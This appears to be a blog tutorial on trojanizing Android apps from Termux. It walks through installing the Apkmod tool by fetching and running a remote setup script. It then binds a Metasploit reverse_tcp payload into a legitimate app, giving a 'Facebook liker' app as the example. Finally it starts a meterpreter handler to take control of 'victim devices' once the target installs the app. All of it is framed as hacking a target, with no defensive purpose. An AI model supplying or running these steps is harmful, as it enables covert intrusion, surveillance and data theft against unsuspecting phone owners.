Banner ads

how to bind payload in apk from termux

how to bind payload in apk from termux - Hi guys if you are searching for how to bind payload in apk from termux and searching for the best article to get the best explanation about how to bind payload in apk from termux. Then you are in the right place.

Today I'm here going to share the step by step tutorial about "how to bind payload in apk from termux". By this article, you can get a lot of about how to bind payload in apk from termux, apkmod tool, how to hack android mobile. And I'm damn sure that you will never get all these unique information like us on the internet anywhere else.

how to bind payload in apk from termux
how to bind payload in apk from termux

how to bind payload in apk from termux

Hello, guys welcome back. So today let us learn how to hack android from Metasploit payload with the help of termux. In this method we will bind a payload with third-party application like  Facebook liker app and others, So to do that we need a tool named Apkmod which helps us to bind payload with the real app without any issue, Follow below steps to create payload and hack your target.

#Follow these steps

$ apt-get update -y

$ apt-get upgrade -y

$ pkg install python -y

$ pkg install python2 -y

$ pkg install git -y

$ pkg install wget

$ ls

$ cd $HOME

$ wget https://raw.githubusercontent.com/Hax4us/Apkmod/master/setup.sh

$ ls

$ bash setup.sh

Now here the installation process will start and it may take a long time to get done so please wait for it to complete...

Now download the application in which you would like to bind payload and hack your target. in my case i downloaded ApentalCalc Apk (Facebook Liker app), Now move your selected app to internal storage of your mobile, after that open termux and follow below steps.

$ ls

$ cd $HOME

$ apkmod -b /sdcard/yourappname.apk -o /sdcard/anyname.apk lhost=127.0.0.1 lport=4444

EX:- apkmod -b /sdcard/apentalcalc.apk -o /sdcard/liker.apk lhost=192.168.73.123 lport=4444

Like the above example, you have to type the command and after that hit the enter button and after that binding process can take 20-30 minutes so please wait for it to complete. After the payload is built successfully now open Metasploit in new session by typing.

$ msfconsole

Now the Metasploit framework opens now in this you have to type these commands.

$ use exploit/multi/handler

$ set payload /android/meterpreter/reverse_tcp

$ set lhost (your Ip)

$ set lport (your port)

$ exploit

Now, if your target installed the payload in his device then a meterpreter session will be shown in the Metasploit framework console. Now type help to get commands to hack your victim devices as you want...




wordlist generating tool in termux in pdf verison

English ----> Click Here 
Kannada ----> Click Here
Tamil ----> Click Here
Urdu ----> Click Here
Hindi ----> Click Here


 websites I used in the video

Click Here

watch the practical video here



 Follow this carefully
Please don't skip the video ...
So guys follow the steps as I showed from starting of the video to the end of the video ok. So after all, if you are facing any problem then comment or use the contact us page, please........


Errors or issue reasons


  • Command error 

  • Data connection problem 

  • Big letters using in commands 

  • Giving more space b/n words 

  • lack of patience


    "Solution for all these problems is watching a video without skip until the end"

    Link for Script/Tool will be available below
    Click On Below Button

    Post a Comment

    0 Comments